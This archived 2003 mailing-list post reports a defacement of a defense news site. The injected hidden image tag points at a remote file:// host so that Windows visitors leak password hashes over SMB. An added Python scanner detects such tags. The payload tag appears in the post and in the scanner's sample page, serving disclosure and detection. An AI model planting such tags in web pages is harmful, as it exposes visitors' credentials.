For the third time since May 5th, a site which provides news about Department of Defense issues has apparently been defaced. The hack is described in Ed Skoudis's excellent book entitled "Counter Hack" (pages 289-290).

The hack we noticed today is a web page with content of the form

<img src=file://korean_ip_address/test.jpg height=0 width=0>

If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows hosts will attempt to send password hashes to the remote host. Hosts may attempt to contact the remote host on other ports (e.g. 80) as well.

This clearly illustrates the importance of outbound traffic filtering.

Vern Stark, GCIA, GSEC
JHU/APL
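
Added example, not part of the original post: a Python scanner that a site owner or proxy operator could run over served HTML to flag the kind of reference described above, where a URL attribute points at a remote file:// or UNC host. The names scan_html and RemoteFileRefFinder, the sample page, the address 192.0.2.10 and the host fileserver.example are all constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes a browser or mail client may fetch from without user action.
URL_ATTRS = {"src", "href", "background", "data", "dynsrc", "lowsrc"}
# Remote forms: file://host/..., file:////host/..., \\host\share.
# file:///C:/... (three slashes, empty host) is local and must not match.
REMOTE = re.compile(r"^\s*(?:file:(?://|/{4,5})|\\\\)([^/\\\s]+)[/\\]", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


class RemoteFileRefFinder(HTMLParser):
    """Collects tags whose URL attributes point at a remote file/UNC host."""

    def __init__(self, allowed_hosts=()):
        super().__init__(convert_charrefs=True)
        self.allowed = LOCAL_HOSTS | {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        amap = {k: (v or "") for k, v in attrs}
        # Zero-sized elements, as in the post, are invisible to the reader.
        hidden = "0" in (amap.get("height"), amap.get("width"))
        for name in sorted(URL_ATTRS.intersection(amap)):
            m = REMOTE.match(amap[name])
            if m and m.group(1).lower() not in self.allowed:
                self.findings.append({"line": self.getpos()[0], "tag": tag,
                                      "attr": name, "host": m.group(1),
                                      "hidden": hidden})


def scan_html(html, allowed_hosts=()):
    finder = RemoteFileRefFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page; 192.0.2.10 is a documentation-range address.
SAMPLE = r"""<html><body>
<img src=file://192.0.2.10/test.jpg height=0 width=0>
<img src="file:///C:/local/logo.png">
<a href="\\fileserver.example\share\doc.txt">doc</a>
<img src="https://www.example.org/banner.png">
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE):
        print(f)
```

A finding with "hidden" set and a host outside your own network is the pattern from the post; internal file servers can be passed in allowed_hosts to cut noise.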
This archive was generated by hypermail 2b30 : Fri Jul 18 2003 - 11:14:35 PDT